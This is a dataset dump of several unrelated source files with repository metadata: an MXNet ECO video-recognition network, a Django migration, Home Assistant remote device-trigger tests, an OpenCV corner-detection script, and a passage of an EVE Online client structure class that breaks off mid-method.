print("features_3d:",f3d(nd.zeros(shape=(5,128,4,28,28))).shape)
print("features_3d:",f3d(nd.zeros(shape=(5,128,8,28,28))).shape)
print("features_3d:",f3d(nd.zeros(shape=(5,128,16,28,28))).shape)
print("features_3d:",f3d(nd.zeros(shape=(5,128,32,28,28))).shape)
print("features_3d:",f3d(nd.zeros(shape=(5,512,4,28,28))).shape)
print("features_3d:",f3d(nd.zeros(shape=(5,512,8,28,28))).shape)
print("features_3d:",f3d(nd.zeros(shape=(5,512,16,28,28))).shape)
print("features_3d:",f3d(nd.zeros(shape=(5,512,32,28,28))).shape)
"""
import os
import mxnet as mx
from mxnet import init
from mxnet.gluon import nn
#from mxnet.gluon.nn import HybridBlock
from gluoncv.model_zoo import get_model
from .r2plus1d import conv3x1x1,Conv2Plus1D
from .r2plus1d import BasicBlock as BasicBlock_2Plus1D
__all__ = ['eco_resnet18_v2','eco_resnet18_v1b','eco_resnet18_v1b_k400','eco_resnet34_v1b','eco_resnet34_v1b_k400','eco_resnet50_v1b','eco_resnet50_v1b_k400','eco_resnet101_v1b','eco_resnet101_v1b_k400','eco_resnet152_v1b','eco_resnet152_v1b_k400','eco_resnet18_v1b_k400_ucf101']
class BasicBlock(nn.HybridBlock):
    """3D residual basic block: two 3x3x3 conv+BN stages with a residual
    connection, projecting the identity branch through a 1x1x1 conv+BN
    whenever the channel count or either stride changes.

    NOTE(review): the ``downsample`` parameter is accepted but never used —
    the shortcut is derived from the channel/stride arguments instead.
    """
    def __init__(self, in_channel, out_channel, spatial_stride=1, temporal_stride=1, downsample=None, **kwargs):
        super(BasicBlock, self).__init__()
        # First conv carries both the temporal and the spatial stride.
        self.conv1 = nn.Conv3D(in_channels=in_channel, channels=out_channel,
            kernel_size=(3,3,3), strides=(temporal_stride,spatial_stride,spatial_stride), padding=(1,1,1),
            weight_initializer=init.Xavier(rnd_type='gaussian', factor_type='out', magnitude=2), bias_initializer='zero')
        self.conv2 = nn.Conv3D(in_channels=out_channel, channels=out_channel,
            kernel_size=(3,3,3), strides=(1,1,1), padding=(1,1,1),
            weight_initializer=init.Xavier(rnd_type='gaussian', factor_type='out', magnitude=2), bias_initializer='zero')
        self.bn1 = nn.BatchNorm(in_channels=out_channel, epsilon=0.001)
        self.bn2 = nn.BatchNorm(in_channels=out_channel, epsilon=0.001)
        self.relu1 = nn.Activation('relu')
        self.relu2 = nn.Activation('relu')
        # Projection shortcut only when the residual shapes would not match.
        if in_channel != out_channel or spatial_stride != 1 or temporal_stride != 1:
            self.down_sample = nn.HybridSequential()
            self.down_sample.add(
                nn.Conv3D(in_channels=in_channel, channels=out_channel,
                    kernel_size=1, strides=(temporal_stride,spatial_stride,spatial_stride),
                    weight_initializer=init.Xavier(rnd_type='gaussian', factor_type='out', magnitude=2)
                    , use_bias=False),
                nn.BatchNorm(in_channels=out_channel, epsilon=0.001)
            )
        else:
            self.down_sample = None

    def hybrid_forward(self, F, x):
        out = self.conv1(x)
        out = self.bn1(out)
        out = self.relu1(out)
        out = self.conv2(out)
        out = self.bn2(out)
        # Project the identity branch when shapes differ, then add and activate.
        if self.down_sample is not None:
            x = self.down_sample(x)
        return self.relu2(x+out)
#class base_resnet18_v1b(nn.HybridBlock):
# def __init__(self,pretrained=True,batch_normal=True, dropout_ratio=0.8, init_std=0.001,**kwargs):
# super(base_resnet18_v1b, self).__init__()
# self.net = get_model('resnet18_v1b',pretrained=pretrained)
# def hybrid_forward(self, F, x):
# #x = nd.zeros(shape=(1,3,224,224))
# t = self.net.conv1(x)
# t = self.net.bn1(t)
# t = self.net.relu(t)
# t = self.net.maxpool(t)
# t = self.net.layer1(t)
# t = self.net.layer2(t)
# # t.shape (1, 128, 28, 28)
# return t
#
#class base_resnet18_v2(nn.HybridBlock):
# def __init__(self,pretrained=True,batch_normal=True, dropout_ratio=0.8, init_std=0.001,**kwargs):
# super(base_resnet18_v2, self).__init__()
# self.net = get_model('resnet18_v2',pretrained=pretrained)
# def hybrid_forward(self, F, x):
# for i in range(7):
# x = self.net.features[i](x)
# return x
class ECO(nn.HybridBlock):
    """ECO video network: a 2D ResNet trunk applied per frame (conv1..layer2)
    followed by a 3D ResNet head over the stacked segment features.

    Parameters
    ----------
    nclass : int
        Number of target classes.
    base_model : str
        Name of the gluoncv 2D backbone ('resnet18_v2' or a resnet*_v1b variant).
    num_segments : int
        Frames sampled per clip (expected: 4, 8, 16 or 32).
    num_temporal : int
        Temporal stride of the first 3D block (forced to 1 for 4 segments).
    ifTSN : bool
        If True, average 3D features over time (TSN-style consensus);
        otherwise flatten them before the classifier.
    """
    def __init__(self, nclass, base_model='resnet18_v1b', pretrained_base=True, num_segments=8, num_temporal=1, ifTSN=True, input_channel=3, batch_normal=True, dropout_ratio=0.8, init_std=0.001, **kwargs):
        super(ECO, self).__init__()
        self.nclass = nclass
        self.dropout_ratio=dropout_ratio
        self.init_std=init_std
        self.num_segments = num_segments
        self.ifTSN = ifTSN
        self.input_shape = 224
        self.base_model = base_model  # e.g. 'resnet18_v1b', 'resnet18_v2', 'resnet18_v1b_kinetics400'
        # resnet50/101/152 v1b use bottleneck blocks with expansion factor 4.
        if 'resnet18_v1b' in self.base_model:
            self.expansion = 1
        elif 'resnet34_v1b' in self.base_model:
            self.expansion = 1
        elif 'resnet50_v1b' in self.base_model:
            self.expansion = 4
        elif 'resnet101_v1b' in self.base_model:
            self.expansion = 4
        elif 'resnet152_v1b' in self.base_model:
            self.expansion = 4
        else:
            self.expansion = 1
        # Channel count coming out of the 2D trunk (after layer2).
        self.feat_dim_2d = 128 * self.expansion
        # num_temporal defaults to 1; per the paper the temporal dimension is
        # not reduced at the start, and with only 4 segments it never is.
        if self.num_segments == 4:
            self.num_temporal=1
        elif self.num_segments == 8:
            self.num_temporal=num_temporal
        elif self.num_segments == 16:
            self.num_temporal=num_temporal
        elif self.num_segments == 32:
            self.num_temporal=num_temporal
        else:
            self.num_temporal=1
        # Dimensionality handed to the classifier head.
        if self.ifTSN == True:
            self.feat_dim_3d = 512
        else:  # Flatten: 512 channels times the surviving temporal length
            tmppara = self.num_segments // 4
            tmppara = tmppara // (self.num_temporal if tmppara > 1 else 1)
            self.feat_dim_3d = 512 * tmppara
        pretrained_model = get_model(self.base_model, pretrained=pretrained_base)
        with self.name_scope():
            # 2D feature trunk, borrowed from the pretrained backbone.
            if self.base_model == 'resnet18_v2':
                self.feature2d = pretrained_model.features
            else:  # resnet*_v1b variants expose the stages as attributes
                self.conv1 = pretrained_model.conv1
                self.bn1 = pretrained_model.bn1
                self.relu = pretrained_model.relu
                # NOTE(review): duplicate assignment of conv1 — harmless but redundant.
                self.conv1 = pretrained_model.conv1
                self.maxpool = pretrained_model.maxpool
                self.layer1 = pretrained_model.layer1
                self.layer2 = pretrained_model.layer2
            # 3D feature head (ResNet-3D conv3_x..conv5_x).
            self.features_3d = nn.HybridSequential(prefix='')
            # conv3_x
            self.features_3d.add(BasicBlock(in_channel=self.feat_dim_2d, out_channel=128, spatial_stride=1, temporal_stride=self.num_temporal))
            self.features_3d.add(BasicBlock(in_channel=128, out_channel=128, spatial_stride=1, temporal_stride=1))
            # conv4_x
            self.features_3d.add(BasicBlock(in_channel=128, out_channel=256, spatial_stride=2, temporal_stride=2))
            self.features_3d.add(BasicBlock(in_channel=256, out_channel=256, spatial_stride=1, temporal_stride=1))
            # conv5_x
            self.features_3d.add(BasicBlock(in_channel=256, out_channel=512, spatial_stride=2, temporal_stride=2))
            self.features_3d.add(BasicBlock(in_channel=512, out_channel=512, spatial_stride=1, temporal_stride=1))
            self.features_3d.add(nn.AvgPool3D(pool_size=(1,7,7)))
            self.dropout = nn.Dropout(rate=self.dropout_ratio)
            # Classifier: single FC with TSN consensus, otherwise two FCs over
            # the flattened 3D features.
            self.output = nn.HybridSequential(prefix='')
            if self.ifTSN == True:
                self.output.add( nn.Dense(units=self.nclass, in_units=512,
                            weight_initializer=init.Normal(sigma=self.init_std)) )
            else:
                self.output.add( nn.Dense(units=512, in_units=self.feat_dim_3d,
                            weight_initializer=init.Normal(sigma=self.init_std)),
                            nn.Dense(units=self.nclass, in_units=512,
                            weight_initializer=init.Normal(sigma=self.init_std)) )
            # Only the newly created (non-pretrained) parts are initialized here.
            self.features_3d.initialize(init.MSRAPrelu())
            self.output.initialize(init.MSRAPrelu())

    def hybrid_forward(self, F, x):
        # 2D trunk over every frame independently.
        # x: (N * num_segments, 3, 224, 224)
        if self.base_model == 'resnet18_v2':
            for i in range(7):
                x = self.feature2d[i](x)
        else:  # resnet*_v1b
            t = self.conv1(x)
            t = self.bn1(t)
            t = self.relu(t)
            t = self.maxpool(t)
            t = self.layer1(t)
            x = self.layer2(t)
        # Regroup per clip: (N, num_segments, feat_dim_2d, 28, 28).
        x = x.reshape((-1, self.num_segments, self.feat_dim_2d, 28, 28))
        # Channels-first for the 3D head: (N, feat_dim_2d, num_segments, 28, 28).
        x = x.transpose(axes=(0,2,1,3,4))
        # 3D head
        x = self.features_3d(x)
        if self.ifTSN == True:
            # Segmental consensus: average over the remaining temporal axis.
            x = F.mean(x, axis=2)
        else:
            x = F.flatten(x)
        x = self.output(self.dropout(x))
        return x
def eco_resnet18_v2(pretrained=False,
                    root='~/.mxnet/models', **kwargs):
    """ECO with a ResNet18-v2 2D trunk. ``pretrained`` is accepted for API
    symmetry but no pretrained weights are wired up for this variant yet."""
    model = ECO(base_model='resnet18_v2', **kwargs)
    if pretrained:
        pass
    return model
def eco_resnet18_v1b_k400_ucf101(pretrained=False,
                    root='~/.mxnet/models', **kwargs):
    """ECO with a ResNet18-v1b trunk (Kinetics400-pretrained backbone);
    optionally loads UCF101 fine-tuned weights from *root*."""
    model = ECO(base_model='resnet18_v1b_kinetics400', **kwargs)
    if pretrained:
        params_file = '0.6349-ucf101-eco_resnet18_v1b_k400_ucf101-068-best.params'
        params_path = os.path.expanduser(os.path.join(root, params_file))
        model.load_parameters(params_path, allow_missing=True)
        print(params_path)
    return model
#
def eco_resnet18_v1b_k400(pretrained=False,
                    root='~/.mxnet/models', **kwargs):
    """ECO with a Kinetics400-pretrained ResNet18-v1b trunk. ``pretrained``
    ECO weights are not wired up yet."""
    model = ECO(base_model='resnet18_v1b_kinetics400', **kwargs)
    if pretrained:
        pass
    return model
def eco_resnet18_v1b(pretrained=False,
                    root='~/.mxnet/models', **kwargs):
    """ECO with an ImageNet-pretrained ResNet18-v1b trunk. ``pretrained``
    ECO weights are not wired up yet."""
    model = ECO(base_model='resnet18_v1b', **kwargs)
    if pretrained:
        pass
    return model
def eco_resnet34_v1b_k400(pretrained=False,
                    root='~/.mxnet/models', **kwargs):
    """ECO with a Kinetics400-pretrained ResNet34-v1b trunk. ``pretrained``
    ECO weights are not wired up yet."""
    model = ECO(base_model='resnet34_v1b_kinetics400', **kwargs)
    if pretrained:
        pass
    return model
def eco_resnet34_v1b(pretrained=False,
                    root='~/.mxnet/models', **kwargs):
    """ECO with an ImageNet-pretrained ResNet34-v1b trunk. ``pretrained``
    ECO weights are not wired up yet."""
    model = ECO(base_model='resnet34_v1b', **kwargs)
    if pretrained:
        pass
    return model
#
def eco_resnet50_v1b_k400(pretrained=False,
                    root='~/.mxnet/models', **kwargs):
    """ECO with a Kinetics400-pretrained ResNet50-v1b trunk. ``pretrained``
    ECO weights are not wired up yet."""
    model = ECO(base_model='resnet50_v1b_kinetics400', **kwargs)
    if pretrained:
        pass
    return model
def eco_resnet50_v1b(pretrained=False,
                    root='~/.mxnet/models', **kwargs):
    """ECO with an ImageNet-pretrained ResNet50-v1b trunk. ``pretrained``
    ECO weights are not wired up yet."""
    model = ECO(base_model='resnet50_v1b', **kwargs)
    if pretrained:
        pass
    return model
#
def eco_resnet101_v1b_k400(pretrained=False,
                    root='~/.mxnet/models', **kwargs):
    """ECO with a Kinetics400-pretrained ResNet101-v1b trunk. ``pretrained``
    ECO weights are not wired up yet."""
    model = ECO(base_model='resnet101_v1b_kinetics400', **kwargs)
    if pretrained:
        pass
    return model
def eco_resnet101_v1b(pretrained=False,
                    root='~/.mxnet/models', **kwargs):
    """ECO with an ImageNet-pretrained ResNet101-v1b trunk. ``pretrained``
    ECO weights are not wired up yet."""
    model = ECO(base_model='resnet101_v1b', **kwargs)
    if pretrained:
        pass
    return model
#
def eco_resnet152_v1b_k400(pretrained=False,
                    root='~/.mxnet/models', **kwargs):
    """ECO with a Kinetics400-pretrained ResNet152-v1b trunk. ``pretrained``
    ECO weights are not wired up yet."""
    model = ECO(base_model='resnet152_v1b_kinetics400', **kwargs)
    if pretrained:
        pass
    return model
def eco_resnet152_v1b(pretrained=False,
                    root='~/.mxnet/models', **kwargs):
    """ECO with an ImageNet-pretrained ResNet152-v1b trunk. ``pretrained``
    ECO weights are not wired up yet."""
    model = ECO(base_model='resnet152_v1b', **kwargs)
    if pretrained:
        pass
    return model
| [
"rovingthrough@163.com"
] | rovingthrough@163.com |
11513db9ae5b8be93cda1263ff6f7d9256a10e47 | 6f96f722aaca40e75e17a7e1e728d5cb8fc1a9df | /mysite/Mysite/migrations/0010_auto_20200212_1216.py | 73eda94639637a831bbe6ab1345cee255f0b3101 | [] | no_license | sathiyasangar/Django_crud | cbe83a9c8b185adb4286f2fa83244e7712dee621 | 042362ab5fd0edae7d505dcdc9cd2539f470220e | refs/heads/master | 2020-12-28T04:01:56.408080 | 2020-02-17T07:24:28 | 2020-02-17T07:24:28 | 238,173,700 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 436 | py | # Generated by Django 3.0.3 on 2020-02-12 12:16
from django.db import migrations
class Migration(migrations.Migration):
    """Auto-generated schema migration: drop the ``created_at`` and
    ``updated_at`` timestamp fields from the ``regis`` model."""

    dependencies = [
        ('Mysite', '0009_auto_20200212_1215'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='regis',
            name='created_at',
        ),
        migrations.RemoveField(
            model_name='regis',
            name='updated_at',
        ),
    ]
| [
"sathiyasangar@gmail.com"
] | sathiyasangar@gmail.com |
01ef88728bf02ea3ad9fac6b0c5c4f64a492c30a | 96dcea595e7c16cec07b3f649afd65f3660a0bad | /tests/components/remote/test_device_trigger.py | b5dcca3dc4c9f2fe772eca66fdec608d73ab918b | [
"Apache-2.0"
] | permissive | home-assistant/core | 3455eac2e9d925c92d30178643b1aaccf3a6484f | 80caeafcb5b6e2f9da192d0ea6dd1a5b8244b743 | refs/heads/dev | 2023-08-31T15:41:06.299469 | 2023-08-31T14:50:53 | 2023-08-31T14:50:53 | 12,888,993 | 35,501 | 20,617 | Apache-2.0 | 2023-09-14T21:50:15 | 2013-09-17T07:29:48 | Python | UTF-8 | Python | false | false | 13,958 | py | """The test for remote device automation."""
from datetime import timedelta
import pytest
from pytest_unordered import unordered
import homeassistant.components.automation as automation
from homeassistant.components.device_automation import DeviceAutomationType
from homeassistant.components.remote import DOMAIN
from homeassistant.const import STATE_OFF, STATE_ON, EntityCategory
from homeassistant.core import HomeAssistant
from homeassistant.helpers import device_registry as dr, entity_registry as er
from homeassistant.helpers.entity_registry import RegistryEntryHider
from homeassistant.setup import async_setup_component
import homeassistant.util.dt as dt_util
from tests.common import (
MockConfigEntry,
async_fire_time_changed,
async_get_device_automation_capabilities,
async_get_device_automations,
async_mock_service,
)
# Re-exporting the shared ``stub_blueprint_populate`` fixture as autouse makes
# the blueprint-copy stub apply automatically to every test in this module.
@pytest.fixture(autouse=True, name="stub_blueprint_populate")
def stub_blueprint_populate_autouse(stub_blueprint_populate: None) -> None:
    """Stub copying the blueprints to the config folder."""
@pytest.fixture
def calls(hass):
    """Track calls to a mock service."""
    # Returns the list that the mocked ``test.automation`` service appends
    # each received service call to.
    return async_mock_service(hass, "test", "automation")
async def test_get_triggers(
    hass: HomeAssistant,
    device_registry: dr.DeviceRegistry,
    entity_registry: er.EntityRegistry,
) -> None:
    """Test we get the expected triggers from a remote."""
    # Register a device and one remote entity attached to it so the
    # device-automation helpers have something to inspect.
    config_entry = MockConfigEntry(domain="test", data={})
    config_entry.add_to_hass(hass)
    device_entry = device_registry.async_get_or_create(
        config_entry_id=config_entry.entry_id,
        connections={(dr.CONNECTION_NETWORK_MAC, "12:34:56:AB:CD:EF")},
    )
    entity_entry = entity_registry.async_get_or_create(
        DOMAIN, "test", "5678", device_id=device_entry.id
    )
    expected_triggers = [
        {
            "platform": "device",
            "domain": DOMAIN,
            "type": trigger,
            "device_id": device_entry.id,
            "entity_id": entity_entry.id,
            "metadata": {"secondary": False},
        }
        for trigger in ["changed_states", "turned_off", "turned_on"]
    ]
    triggers = await async_get_device_automations(
        hass, DeviceAutomationType.TRIGGER, device_entry.id
    )
    # Trigger ordering is not guaranteed, hence the unordered comparison.
    assert triggers == unordered(expected_triggers)
# Cover both hiding mechanisms (integration- and user-hidden) and both
# auxiliary entity categories; all four must mark the trigger as secondary.
@pytest.mark.parametrize(
    ("hidden_by", "entity_category"),
    (
        (RegistryEntryHider.INTEGRATION, None),
        (RegistryEntryHider.USER, None),
        (None, EntityCategory.CONFIG),
        (None, EntityCategory.DIAGNOSTIC),
    ),
)
async def test_get_triggers_hidden_auxiliary(
    hass: HomeAssistant,
    device_registry: dr.DeviceRegistry,
    entity_registry: er.EntityRegistry,
    hidden_by,
    entity_category,
) -> None:
    """Test we get the expected triggers from a hidden or auxiliary entity."""
    config_entry = MockConfigEntry(domain="test", data={})
    config_entry.add_to_hass(hass)
    device_entry = device_registry.async_get_or_create(
        config_entry_id=config_entry.entry_id,
        connections={(dr.CONNECTION_NETWORK_MAC, "12:34:56:AB:CD:EF")},
    )
    entity_entry = entity_registry.async_get_or_create(
        DOMAIN,
        "test",
        "5678",
        device_id=device_entry.id,
        entity_category=entity_category,
        hidden_by=hidden_by,
    )
    expected_triggers = [
        {
            "platform": "device",
            "domain": DOMAIN,
            "type": trigger,
            "device_id": device_entry.id,
            "entity_id": entity_entry.id,
            # Hidden/auxiliary entities are exposed as secondary automations.
            "metadata": {"secondary": True},
        }
        for trigger in ["changed_states", "turned_off", "turned_on"]
    ]
    triggers = await async_get_device_automations(
        hass, DeviceAutomationType.TRIGGER, device_entry.id
    )
    assert triggers == unordered(expected_triggers)
async def test_get_trigger_capabilities(
    hass: HomeAssistant,
    device_registry: dr.DeviceRegistry,
    entity_registry: er.EntityRegistry,
) -> None:
    """Test we get the expected capabilities from a remote trigger."""
    config_entry = MockConfigEntry(domain="test", data={})
    config_entry.add_to_hass(hass)
    device_entry = device_registry.async_get_or_create(
        config_entry_id=config_entry.entry_id,
        connections={(dr.CONNECTION_NETWORK_MAC, "12:34:56:AB:CD:EF")},
    )
    entity_registry.async_get_or_create(
        DOMAIN, "test", "5678", device_id=device_entry.id
    )
    # Every remote trigger supports an optional "for" duration field.
    expected_capabilities = {
        "extra_fields": [
            {"name": "for", "optional": True, "type": "positive_time_period_dict"}
        ]
    }
    triggers = await async_get_device_automations(
        hass, DeviceAutomationType.TRIGGER, device_entry.id
    )
    for trigger in triggers:
        capabilities = await async_get_device_automation_capabilities(
            hass, DeviceAutomationType.TRIGGER, trigger
        )
        assert capabilities == expected_capabilities
async def test_get_trigger_capabilities_legacy(
    hass: HomeAssistant,
    device_registry: dr.DeviceRegistry,
    entity_registry: er.EntityRegistry,
) -> None:
    """Test we get the expected capabilities from a remote trigger."""
    config_entry = MockConfigEntry(domain="test", data={})
    config_entry.add_to_hass(hass)
    device_entry = device_registry.async_get_or_create(
        config_entry_id=config_entry.entry_id,
        connections={(dr.CONNECTION_NETWORK_MAC, "12:34:56:AB:CD:EF")},
    )
    entity_registry.async_get_or_create(
        DOMAIN, "test", "5678", device_id=device_entry.id
    )
    expected_capabilities = {
        "extra_fields": [
            {"name": "for", "optional": True, "type": "positive_time_period_dict"}
        ]
    }
    triggers = await async_get_device_automations(
        hass, DeviceAutomationType.TRIGGER, device_entry.id
    )
    for trigger in triggers:
        # Legacy style: triggers referenced by entity_id instead of registry id.
        trigger["entity_id"] = entity_registry.async_get(trigger["entity_id"]).entity_id
        capabilities = await async_get_device_automation_capabilities(
            hass, DeviceAutomationType.TRIGGER, trigger
        )
        assert capabilities == expected_capabilities
async def test_if_fires_on_state_change(
    hass: HomeAssistant,
    entity_registry: er.EntityRegistry,
    calls,
    enable_custom_integrations: None,
) -> None:
    """Test for turn_on and turn_off triggers firing."""
    entry = entity_registry.async_get_or_create(DOMAIN, "test", "5678")

    # Start from a known ON state so the first transition is on -> off.
    hass.states.async_set(entry.entity_id, STATE_ON)

    # Three automations, one per trigger type, each recording the trigger
    # context through the mocked test.automation service.
    assert await async_setup_component(
        hass,
        automation.DOMAIN,
        {
            automation.DOMAIN: [
                {
                    "trigger": {
                        "platform": "device",
                        "domain": DOMAIN,
                        "device_id": "",
                        "entity_id": entry.id,
                        "type": "turned_on",
                    },
                    "action": {
                        "service": "test.automation",
                        "data_template": {
                            "some": "turn_on {{ trigger.%s }}"
                            % "}} - {{ trigger.".join(
                                (
                                    "platform",
                                    "entity_id",
                                    "from_state.state",
                                    "to_state.state",
                                    "for",
                                )
                            )
                        },
                    },
                },
                {
                    "trigger": {
                        "platform": "device",
                        "domain": DOMAIN,
                        "device_id": "",
                        "entity_id": entry.id,
                        "type": "turned_off",
                    },
                    "action": {
                        "service": "test.automation",
                        "data_template": {
                            "some": "turn_off {{ trigger.%s }}"
                            % "}} - {{ trigger.".join(
                                (
                                    "platform",
                                    "entity_id",
                                    "from_state.state",
                                    "to_state.state",
                                    "for",
                                )
                            )
                        },
                    },
                },
                {
                    "trigger": {
                        "platform": "device",
                        "domain": DOMAIN,
                        "device_id": "",
                        "entity_id": entry.id,
                        "type": "changed_states",
                    },
                    "action": {
                        "service": "test.automation",
                        "data_template": {
                            "some": "turn_on_or_off {{ trigger.%s }}"
                            % "}} - {{ trigger.".join(
                                (
                                    "platform",
                                    "entity_id",
                                    "from_state.state",
                                    "to_state.state",
                                    "for",
                                )
                            )
                        },
                    },
                },
            ]
        },
    )
    assert len(calls) == 0

    # on -> off fires both the turned_off and changed_states automations;
    # firing order is not guaranteed, so compare as sets.
    hass.states.async_set(entry.entity_id, STATE_OFF)
    await hass.async_block_till_done()
    assert len(calls) == 2
    assert {calls[0].data["some"], calls[1].data["some"]} == {
        f"turn_off device - {entry.entity_id} - on - off - None",
        f"turn_on_or_off device - {entry.entity_id} - on - off - None",
    }

    # off -> on fires both the turned_on and changed_states automations.
    hass.states.async_set(entry.entity_id, STATE_ON)
    await hass.async_block_till_done()
    assert len(calls) == 4
    assert {calls[2].data["some"], calls[3].data["some"]} == {
        f"turn_on device - {entry.entity_id} - off - on - None",
        f"turn_on_or_off device - {entry.entity_id} - off - on - None",
    }
async def test_if_fires_on_state_change_legacy(
    hass: HomeAssistant,
    entity_registry: er.EntityRegistry,
    calls,
    enable_custom_integrations: None,
) -> None:
    """Test for turn_on and turn_off triggers firing."""
    entry = entity_registry.async_get_or_create(DOMAIN, "test", "5678")
    hass.states.async_set(entry.entity_id, STATE_ON)

    # Template recording every interesting trigger context field.
    template_fields = "}} - {{ trigger.".join(
        ("platform", "entity_id", "from_state.state", "to_state.state", "for")
    )
    config = {
        automation.DOMAIN: [
            {
                "trigger": {
                    "platform": "device",
                    "domain": DOMAIN,
                    "device_id": "",
                    # Legacy style: reference by entity_id, not registry id.
                    "entity_id": entry.entity_id,
                    "type": "turned_off",
                },
                "action": {
                    "service": "test.automation",
                    "data_template": {
                        "some": "turn_off {{ trigger.%s }}" % template_fields
                    },
                },
            }
        ]
    }
    assert await async_setup_component(hass, automation.DOMAIN, config)
    assert len(calls) == 0

    # ON -> OFF must fire the legacy "turned_off" automation exactly once.
    hass.states.async_set(entry.entity_id, STATE_OFF)
    await hass.async_block_till_done()
    assert len(calls) == 1
    assert (
        calls[0].data["some"]
        == f"turn_off device - {entry.entity_id} - on - off - None"
    )
async def test_if_fires_on_state_change_with_for(
    hass: HomeAssistant,
    entity_registry: er.EntityRegistry,
    calls,
    enable_custom_integrations: None,
) -> None:
    """Test for triggers firing with delay."""
    entry = entity_registry.async_get_or_create(DOMAIN, "test", "5678")
    hass.states.async_set(entry.entity_id, STATE_ON)

    # Template recording every interesting trigger context field.
    template_fields = "}} - {{ trigger.".join(
        ("platform", "entity_id", "from_state.state", "to_state.state", "for")
    )
    config = {
        automation.DOMAIN: [
            {
                "trigger": {
                    "platform": "device",
                    "domain": DOMAIN,
                    "device_id": "",
                    "entity_id": entry.id,
                    "type": "turned_off",
                    # The state must hold for 5 seconds before firing.
                    "for": {"seconds": 5},
                },
                "action": {
                    "service": "test.automation",
                    "data_template": {
                        "some": "turn_off {{ trigger.%s }}" % template_fields
                    },
                },
            }
        ]
    }
    assert await async_setup_component(hass, automation.DOMAIN, config)
    await hass.async_block_till_done()
    assert len(calls) == 0

    # Turning off starts the 5 s hold timer; nothing fires immediately.
    hass.states.async_set(entry.entity_id, STATE_OFF)
    await hass.async_block_till_done()
    assert len(calls) == 0

    # Jump past the delay; the trigger must now have fired exactly once.
    async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=10))
    await hass.async_block_till_done()
    assert len(calls) == 1
    await hass.async_block_till_done()
    assert (
        calls[0].data["some"]
        == f"turn_off device - {entry.entity_id} - on - off - 0:00:05"
    )
| [
"noreply@github.com"
] | home-assistant.noreply@github.com |
7e5bcff3d846d769cf3f7b62e1922fdc11bb5a71 | a11dc2b1cf9247f38c19c44acd48609f01a9cdd6 | /sampleprogram/01/01-02.py | 8fa1bcadc0cb8649b11d11b7dec52f48eba6dc72 | [] | no_license | churabou/opencv_book_sample | f04b50e1c8c2a0df136c34dc44de4508fdc8d6bc | 33f742c4d10d82633c28e08114640b91a467de45 | refs/heads/master | 2021-08-30T18:59:39.778260 | 2017-12-19T02:46:32 | 2017-12-19T02:46:32 | 114,711,044 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 387 | py | import cv2
# Detect strong corners in an image and mark them with red circles.
img_src = cv2.imread('01-06.jpg', 1)
if img_src is None:
    # cv2.imread returns None (it does not raise) when the file is missing.
    raise FileNotFoundError("Could not read image '01-06.jpg'")
img_gray = cv2.cvtColor(img_src, cv2.COLOR_BGR2GRAY)
img_dst = img_src.copy()
# Up to 1000 corners, quality level 0.1, minimum distance 5 px.
corners = cv2.goodFeaturesToTrack(img_gray, 1000, 0.1, 5)
if corners is not None:  # None when no corner passes the quality threshold
    for corner in corners:
        x, y = corner.ravel()
        # goodFeaturesToTrack returns float32 coordinates, but cv2.circle
        # requires integer pixel centers (OpenCV >= 4.x rejects floats).
        cv2.circle(img_dst, (int(x), int(y)), 3, (0, 0, 255), 2)
cv2.imshow('src', img_src)
cv2.imshow('dst', img_dst)
cv2.waitKey(0)
cv2.destroyAllWindows()
| [
""
] | |
810e8fc904dfdccceb4282cca5aa2a50ec0181a8 | 5864e86954a221d52d4fa83a607c71bacf201c5a | /eve/client/script/environment/spaceObject/structure.py | 88fcfaaef3632e06940848939a4cc0691a53f89d | [] | no_license | connoryang/1v1dec | e9a2303a01e5a26bf14159112b112be81a6560fd | 404f2cebf13b311e754d45206008918881496370 | refs/heads/master | 2021-05-04T02:34:59.627529 | 2016-10-19T08:56:26 | 2016-10-19T08:56:26 | 71,334,417 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,417 | py | #Embedded file name: e:\jenkins\workspace\client_SERENITY\branches\release\SERENITY\eve\client\script\environment\spaceObject\structure.py
import blue
import uthread
import structures
import evetypes
import logging
from eve.client.script.environment.spaceObject.buildableStructure import BuildableStructure
from eve.client.script.environment.model.turretSet import TurretSet
from evegraphics.explosions.spaceObjectExplosionManager import SpaceObjectExplosionManager
# Client-side visual states driven by Structure.GotoState.
STATE_CONSTRUCT = 'construct'
STATE_VULNERABLE = 'vulnerable'
STATE_INVULNERABLE = 'invulnerable'
STATE_SIEGED = 'sieged'
STATE_DECONSTRUCT = 'deconstruct'
# Map server-side structure states (structures.STATE_*) onto the client
# animation/visual states above.  All vulnerability phases share the same
# 'vulnerable' visuals; both reinforcement phases share 'sieged'.
STATES = {structures.STATE_UNKNOWN: STATE_INVULNERABLE,
 structures.STATE_UNANCHORED: STATE_DECONSTRUCT,
 structures.STATE_ANCHORING: STATE_CONSTRUCT,
 structures.STATE_ONLINE: STATE_INVULNERABLE,
 structures.STATE_SHIELD_VULNERABLE: STATE_VULNERABLE,
 structures.STATE_SHIELD_REINFORCE: STATE_SIEGED,
 structures.STATE_ARMOR_VULNERABLE: STATE_VULNERABLE,
 structures.STATE_ARMOR_REINFORCE: STATE_SIEGED,
 structures.STATE_HULL_VULNERABLE: STATE_VULNERABLE}
class Structure(BuildableStructure):
    """Client-side space object for a player-owned structure.

    Translates slim-item state updates pushed from the server into visual
    state changes (anchoring/unanchoring animations, looping idle animation)
    and keeps the fitted turret models in sync with the structure's modules.
    Note: this is Python 2 code (see the 0L literal below).
    """
    __unloadable__ = True
    def __init__(self):
        BuildableStructure.__init__(self)
        self.Init()
    def Release(self):
        # Reset transient state when the object is released back to the pool.
        BuildableStructure.Release(self)
        self.Init()
    def Init(self):
        """Reset all per-instance state to its unloaded defaults."""
        self.fitted = False
        self.state = None
        self.timer = None
        self.turrets = []
        self.modules = {}
    def Assemble(self):
        """Called once the ball is ready; apply rotation, audio and state."""
        self.SetStaticRotation()
        self.SetupSharedAmbientAudio()
        self.OnSlimItemUpdated(self.typeData.get('slimItem'))
    def OnSlimItemUpdated(self, item):
        """React to a server slim-item update.

        Transitions the visual state when the structure state or its timer
        changed, and refits hardpoints when the module list changed.
        """
        if item is None or self.unloaded:
            return
        if item.state and (item.state != self.state or item.timer != self.timer):
            if item.timer and item.state == structures.STATE_ANCHORING:
                # Timer is (start, end, paused) in wallclock blue-time units;
                # convert to seconds for the animation curves.
                start, end, paused = item.timer
